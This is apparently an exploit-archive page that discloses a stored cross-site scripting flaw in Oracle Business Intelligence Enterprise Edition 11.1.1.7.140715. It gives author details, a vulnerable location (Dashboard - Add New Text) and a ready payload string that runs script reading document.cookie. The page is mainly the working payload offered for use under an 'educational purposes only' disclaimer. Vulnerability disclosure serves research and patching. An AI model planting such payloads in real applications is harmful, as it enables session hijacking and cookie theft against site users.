Oracle business intelligence enterprise edition 11.1.1.7.140715 stored xss Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-20 | Type : webapps | Platform : multiple
This exploit / vulnerability Oracle business intelligence enterprise edition 11.1.1.7.140715 stored xss is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text